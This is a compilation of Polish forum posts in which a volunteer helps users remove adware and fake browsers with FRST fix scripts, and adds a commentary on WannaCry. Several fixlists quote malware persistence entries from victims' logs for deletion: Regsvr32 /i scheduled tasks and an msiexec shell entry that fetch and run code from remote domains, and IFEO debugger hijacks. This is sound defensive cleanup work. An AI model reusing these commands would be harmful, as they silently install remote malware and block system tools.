Miszel03

Kliknij PPM na zegarku systemowym, wybierz "Dostosuj ikony powiadomień" -> Wybierz "Ikony wyświetlane na pasku zadań". Odnajdź na liście usługę Windows Defender i zastoju dla niej "Ukryj ikony i powiadomienia" lub "Pokazuj tylko powiadomienia". Uruchom ponowie system i sprawdź efekty. A jeśli chodzi zaś o DelFix to akcja pomyślnie wykonana.

Do niezobaczenia

Tak i to jest jeden z tych producentów, którzy podchodzą do tematu spokojnie i dokładnie. Opanowanie to jedyna cecha, która może przydać się w takiej sytuacji. Np. McAfee blokował szkodliwą domenę przez co wirus mógł bezproblemowo działać. Jeśli domena była dostępna wirus dezaktywował się jeśli nie jechał dalej z psotami. Ten trick z rejestracją domen zadziałał i faktycznie, uciszył panikę, aczkolwiek, niestety już powstały nowe próbki malware bez weryfikacji domeny - KLIK.

A gdzie raport FRST?

W raportach brak oznak infekcji, a drobną kosmetykę systemową pomijam. Do deinstalacji będzie ewentualnie program Shift Happens version 1.0, bo jest flagowany przez FRST, więc pewnie ma coś za uszami. Oprogramowanie należy za wszelką cenę próbować odinstalować normalnie. Takie brutalne usuwanie komponentów zostawia ogromny śmietnik, niewidoczny dla Ciebie. Mogłeś spróbować zrobić to z poziomu Trybu awaryjnego, używając programów deinstalacyjnych itd. Temat przenoszę do działu Hardware. Przeczytaj uważnie posty moderatora tego działu, by poprawnie zdiagnozować i naprawić problem musi mieć odpowiednie dane.

System jest zainfekowany przez adware. Widoczne są dwie fałszywki Mozilli FireFox oraz Google Chrome (= choć nie ma oryginalnej wersji). Nie będę się rozpisywać, bo codziennie widzę tu to samo. Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\ChromeHTML: -> Task: {0C1573E6-EB72-4A0D-B905-E6C7F9C00BF2} - System32\Tasks\{D3350727-1A18-45FF-9650-FE53F21D8DB2} => pcalua.exe -a C:\Users\MAGDA\AppData\Local\Temp\{18E20274-F8B2-4061-934E-E94E4F113858}\InstallFlashPlayer.exe -d C:\Users\MAGDA\AppData\Local\Temp\ICD1.tmp -c -iv 6 Task: {E1EE3ED7-C883-4490-878D-07DB4A475E93} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== scrobj.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Bangtony RemoveDirectory: C:\Users\MAGDA\AppData\Local\Bangtony RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Bangtony FirewallRules: [{E980C772-4A40-40FF-8818-542C65790C55}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe FirewallRules: [{27FC16EC-FFB1-4520-9657-903708EE55B9}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe FirewallRules: [{F76C0C47-6098-4C47-BFF2-D79F08D068BE}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe FirewallRules: [{F5CB7DEC-6781-44FD-867F-C35B93477FAC}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe FirewallRules: [{D5CF5E93-C38C-43BA-AAED-B6B1F3D663F0}] => (Allow) C:\Program Files (x86)\Bangtony\Application\chrome.exe FirewallRules: [{17AA0B84-A7C8-4140-B2BF-336ADA96EDEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{77E9E3FC-75B2-4FF6-A776-0532C8B8AC4F}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\MAGDA\AppData\Local\Firefox RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Firefox HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy\User: Ograniczenia GroupPolicyUsers\S-1-5-21-266744301-1538140241-1666147108-1003\User: Ograniczenia SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> {E88E0043-C9D4-4e33-8555-FEE4F5B63060} URL = hxxp://go.mail.ru/search?q={searchTerms}&utf8in=1&fr=ietb BHO-x32: Brak nazwy -> {8984B388-A5BB-4DF7-B274-77B879E179DB} -> Brak pliku BHO-x32: Brak nazwy -> {b18906df-1dfa-4d50-8a1f-7d076a8c87b7} -> Brak pliku Toolbar: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> Brak nazwy - {09900DE8-1DCA-443F-9243-26FF581438AF} - Brak pliku R2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [210946 ] () [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [93696 2017-05-26] () [brak podpisu cyfrowego] S1 MpKsl609328ae; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{15547DD3-66D3-4FC6-A0C8-D0267EAC43CD}\MpKsl609328ae.sys [X] R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp 2017-05-29 07:14 - 2017-05-29 07:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Witryna Sage.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia Handel - Stacja robocza.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Aktywacja.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Elektroniczne zgłoszenie problemu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Symfonia Handel - Stacja robocza.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Umowa licencyjna.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Word\aneks_pol%20levant305943631758176149\aneks_pol%20levant.doc.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Excel\03%20kwiecień%202017305869361454104687\03%20kwiecień%202017.xls.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\MAGDA\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox. Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Mozilla FireFox. To wymagany krok to kasacji modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bangtony;firefox;biaoJi Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Sprawdź czy AdwCleaner coś wykrywa. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport znajdujący się w C:\AdwCleaner. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Jeżeli nie ma oznak infekcji to możesz zacząć normalnie korzystać z przeglądarek i systemu. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Przecież brak odpowiedzi nie jest spowodowany złością. Nikt kto tu pomagał się nią nie kierował. Od roku pomagam, dużo ludzi otrzymało pomoc, ale nie jestem w stanie obsłużyć wszystkich, a już na pewno nie wtedy kiedy nie ma mnie w domu. Dziękuję, że w lukach kiedy nie ma nikogo do pomocy pomagasz, ale proszę nie rzucaj nam kłód pod nogi.

Usuniemy te detekcję przez FRST, ale ze względu na zainfekowane preferencje i tak będzie trzeba przeinstalować przeglądarkę. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKCU\Software\Classes\CLSID\{79690976-ED6E-403C-BBBA-F8928B5EDE17} DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146} DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A} DeleteKey: HKLM\SOFTWARE\b`nl{y DeleteKey: HKLM\SOFTWARE\{84416237-6490-494D-9AD6-4994DD978971} DeleteKey: HKLM\SOFTWARE\initialpage123Software Task: C:\WINDOWS\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Kompleksowo przeinstaluj przeglądarkę Google Chrome. Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 3. Sprawdź czy AdwCleaner nadal będzie coś wykrywał.

Nie zapożyczaj działań z innych tematów, bo to może się źle skończyć. P.S: Pomijam brak raportu Shortcut, choć nie wolno mi tego robić. W następnym poście obowiązkowo go oczekuję. Widać infekcje adware oraz fałszywe przeglądarki. Szybko się z tym uporamy. Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {AA2F5AA1-E61F-42A6-B2D2-82908FC1C595} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll Task: {CAAE5885-CF5C-4396-B2CB-351343F4F421} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll FirewallRules: [{CD91FEC5-B909-455D-BFA6-F2D988878524}] => (Allow) C:\Program Files (x86)\Everness\Application\chrome.exe FirewallRules: [{2184EBA4-E346-4471-B4F3-A76A961E90B9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{F884D972-202D-4742-9811-8E5A129B9050}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Everness RemoveDirectory: C:\Users\Michał\AppData\Local\Everness RemoveDirectory: C:\Users\Michal\AppData\Roaming\Everness RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Michał\AppData\Local\Firefox RemoveDirectory: C:\Users\Michal\AppData\Roaming\Firefox HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2511481870-1426507333-4213709584-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = S3 dbx; system32\DRIVERS\dbx.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] RemoveDirectory: C:\Program Files (x86)\Elex-tech EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarki. Google Chrome Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. Mozilla FireFox Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). everness;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Upewnij się, że AdwCleaner już niczego nie wykrywa. Ewentualne detekcję daj do kasacji. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Z menu start wybierz CMD.EXE i z prawokliku Uruchom jako administrator.

Nie, to jest log z E-Peek. Pomyliłeś narzędzia.

W raportach brak oznak infekcji (kosmetykę systemową pomijam), więc to nie sprawka infekcji. Poszerzam diagnostykę i przenoszę temat do działu Windows 7. P.S: Te dane co ucina FRST są nieistotne zbyt w tej sytuacji, wiec odpuszczam sobie to. 1. Przejdź do skanowania i naprawy systemu Windows. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER. Uruchomi się okno konsoli komend. W oknie konsoli komend wklej poniższą komendę. sfc /scannow Rozpocznie się weryfikacji integralności systemu, czekaj, a gdy proces dobiegnie końca wklej i użyj poniższa komendę. findstr /c:"[sR]" %windir%\Logs\CBS\CBS.log >"%userprofile%\Desktop\sfc.txt" Na pulpicie powstanie plik SFC - zaprezentuj go na forum. 2. Zrób log z Farbar Service Scanner w celu weryfikacji poniższych usług. Centrum Akcji / Centrum Zabezpieczeń; Przywracanie systemu; Windows Update; Windows Defender; Zapora systemu Windows; Kompleks usług sieciowych.

Nie aktualizowanie oprogramowania to pierwszy stopień do nowego tematu u Nas na forum Czy nie łatwiej zaktualizować program? Trudno mi konkretnie powiedzieć, który wpis na powłoce startowej odpowiada za monit o dostępności aktualizacji. Task: {6E5E4155-DCE7-4120-A4A0-C3813DABFCE9} - System32\Tasks\GlaryInitialize 5 => C:\Programy\Narzędzia\Pakiety Narzędziowe\Glary Utilities\Glary Utilities 5\Initialize.exe [2016-10-21] (Glarysoft Ltd) -> Harmonogram Zadań Task: {C41A3F7F-D8E8-4054-89E2-26CB796FF082} - System32\Tasks\GU5SkipUAC => C:\Programy\Narzędzia\Pakiety Narzędziowe\Glary Utilities\Glary Utilities 5\Integrator.exe [2016-10-21] (Glarysoft Ltd) -> Harmonogram Zadań HKU\S-1-5-21-1326796172-1758662683-4277469698-1001\...\StartupApproved\Run: => "GUDelayStartup" -> wpis w Konfiguracji systemu Windows (usługa msconfig). HKU\S-1-5-21-1326796172-1758662683-4277469698-1001\...\Run: [GUDelayStartup] => C:\Programy\Narzędzia\Pakiety Narzędziowe\Glary Utilities\Glary Utilities 5\StartupManager.exe [43984 2016-10-21] (Glarysoft Ltd) -> wpis na powłoce startowej. Informacja o aktualizacjach często jest głębiej wbudowana i nie można jej wyłączyć. Niektóre programy nie działają na nieaktualnych wersjach ze względu na bezpieczeństwo produktu. Jeśli zaś chodzi o stronę infekcyjną to wygląd to wszystko tj. mówiłem w porządku, a wynik MBAM tylko to potwierdził. Możemy kończyć?

Piszę na szybko. Coś jest nie tak z programem FRST na Twoim systemie. Nie czyta mi w ogóle listy instalacji. Instrukcję są już napisane, ale nie wolno mi przechodzić do działań bez wszystkich informacji o systemie. Daj log z programu MiniToolBox z zaznaczoną opcją List Installed Programs.

Spróbuj uruchomić go i wygenerować raporty z poziomu trybu awaryjnego (klik w klawisz F8 przed startem systemu).

W raportach brak oznak infekcji. Zakładam, że modyfikacja pliku Hosts to Twoja sprawka. Te detekcje Kasperskiego nie wyglądają na poważne. 1. Przez panel sterowania odinstaluj: Unigine Valley Benchmark version 1.0. Jest flagowany przez FRST, więc pewnie ma coś za uszami. Sugeruję również pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1326796172-1758662683-4277469698-1001\...\Run: [backup4all Scheduler] => [X] ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = BHO: Brak nazwy -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Brak pliku BHO-x32: Brak nazwy -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Brak pliku FF NewTab: Mozilla\Firefox\Profiles\3h9hdr6k.default -> chrome://sstart/content/sstart.html C:\ProgramData\sdpsenv.dat AlternateDataStreams: C:\ProgramData\sdpsenv.dat:naughtypirates [322] AlternateDataStreams: C:\ProgramData\TEMP:21654C57 [284] AlternateDataStreams: C:\ProgramData\TEMP:41ADDB8A [144] AlternateDataStreams: C:\ProgramData\TEMP:4FC01C57 [140] AlternateDataStreams: C:\ProgramData\TEMP:6DAA43DB [438] AlternateDataStreams: C:\ProgramData\TEMP:A064CECC [290] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stoper\Pomoc programu Stoper.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stoper\Stoper.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą programu Malwarebytes AntiMalware (masz na dysku, więc robisz tylko kompleks aktualizacji). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Teraz zauważyłem, że log Addition jest ucięty. Dostarcz nowy i przy okazji cały nowy zestaw. Dodatkowo poproszę o log z FSS.

Całość pomyślnie wykonana i od strony infekcyjnej wygląda to już w porządku. Jak podsumowujesz aktualną sytuację? Zastanawiam się tylko nad poniższymi wpisami. Winsock: Catalog9 01 bmnet.dll => Brak pliku Winsock: Catalog9 02 bmnet.dll => Brak pliku Winsock: Catalog9 03 bmnet.dll => Brak pliku Są pomimo zastosowania kompleksowego resetu katalogu. Tutaj mogło dojść do uszkodzenia Zmiennej środowiskowej Patch. Widoczne ścieżki są relatywne. Pokaż mi stan Patch. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz cmd i ENTER. Uruchomi się okno konsoli komend. W oknie konsoli wpisz komendę set i ENTER. Skopiuj wynik i zaprezentuj go na forum.

W raportach brak oznak infekcji. Na jaką stronę wyszukiwarka została podmieniona? Reklamy mogą być spowodowane instalacją uTorrent. Sugeruję go wymienić na czystego klienta Torrent, np qBitTorrent. Wyciągnij mi plik z najnowszym raportem dot. detekcji od AdwCleaner. Znajdziesz go w C:\AdwCleaner. Jeśli chodzi zaś o program HitmanPro to ten niczego nie wykrył oprócz plików ciastek.

A gdzie kluczowy plik Fixlog?

Jest już praktycznie w porządku, a dodatkowo piszesz, że problem ustąpił, więc super. Zostały poprawki oraz globalny skan przeciwwirusowy. 1. Otwórz Notatnik w nim wklej: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Boxbob DeleteKey: HKEY_USERS\S-1-5-21-1870858389-217524516-3277012225-1000\Software\Boxbob FirewallRules: [{1898C9C0-7B1B-4937-B7D5-374E070C4310}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-9yn162_s1d0ytlrxxxxs1d0ytlr.dat FirewallRules: [{FD5F0B34-2064-402B-B5E9-FA0A772452FF}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-9yn162_s1d0ytlrxxxxs1d0ytlr.dat Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

WannaCry...no tak, - niestety... Pewnie już o nim słyszeliście. Jesteśmy świadkami naprawdę ciekawego wydarzenia, ale jakże niebezpiecznego! W maju br. doszło do ataku złośliwym oprogramowaniem WannaCryp (znanym również jako WannaCrypt lub WanaCrypt0r 2.0). Na dzień dzisiejszy zainfekowanych komputerów wg danych z Europolu jest ok. 400 tysięcy. To największy taki atak w ostatnich czasach. Szkodnik ten wykorzystuje exploit o nazwie EternalBlue (znamy go od kilku miesięcy), który rzekomo został zaprojektowany w amerykańskiej agencji bezpieczeństwa narodowego w celu atakowania komputerów z systemem Windows. Nie ma na to jednak żadnego potwierdzenia i ja osobiście uważam to za bzdurę. Bardziej wiarygodna jest hipoteza, że za exploitem stoi północnokoreańska grupa Lazarus, która jest już znana z takich wydarzeń. Sytuacja jest na tyle poważna, że Microsoft 14 marca wydał aktualizacje zabezpieczającą. Na początku otrzymali ją wszyscy użytkownicy wspieranych systemów. Później okazało się, że, aby zatrzymać wirusa należy także natychmiast dać szczepionkę użytkownikom systemu XP. Rodzi się pytanie dlaczego pomimo załatanych systemów wojna nadal trwa? Wiele komputerów ze względu na opóźnienia w instalacji aktualizacji zabezpieczeń nadal są potencjalnym nosicielami szkodnika. Jeśli chodzi zaś o zasięg ataku to nie są to tylko komputery domowe. Wirus zaatakował część brytyjskiej służby zdrowia oraz ok. 1000 komputerów w rosyjskim ministerstwie spraw wewnętrznych. Renault wstrzymał przez wirusa produkcję. 17 maja łączny okup jaki dostali hakerzy wynosił ponad 79 tys. USD, ale ta kwota nadal rośnie. Poniższy film ilustruje rozprzestrzenienie się wirusa. Sprawa przycichła ze względu na mobilizację ekspertów ds. cyberbezpieczeństwa oraz co najważniejsze 22-letniego Brytyjczyka, który zahamował wirusa. Ten analizując próbkę kodu znalazł domenę, do której odwołuje się wirus i zarejestrował ją na siebie. Za ok. 11 dolarów powstrzymał globalną panikę. Zagrożenie zażegnane...musimy wyciągnąć wnioski. Na przykład takie dot. aktualizacja systemów i oprogramowania. Kaspersky opublikował wykres atakowanych systemów operacyjnych Windows. Jak widać...czym nowszy system tym mniejsze ryzyko infekcji. Po panice pojawia się pytanie "Kto? Dlaczego?". Hm..Korea Północna? USA? Nie wiadomo, a ja nie będę niczego sugerował bo mogę się ostro przejechać.

Jessi przeanalizowała raporty poprawnie, więc nie mam co tu poprawiać. Usunęła infekcję i wyczyściła system, a co za tym idzie problem tytułowy. Dodam tylko, że jeden folder wymagana kasacji, a mianowicie C:\Program Files\Hetutain Monito, więc przez SHIFT + DELETE skasuj go. Po tym zabiegu uznaję, że możemy kończyć. Zastoju DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.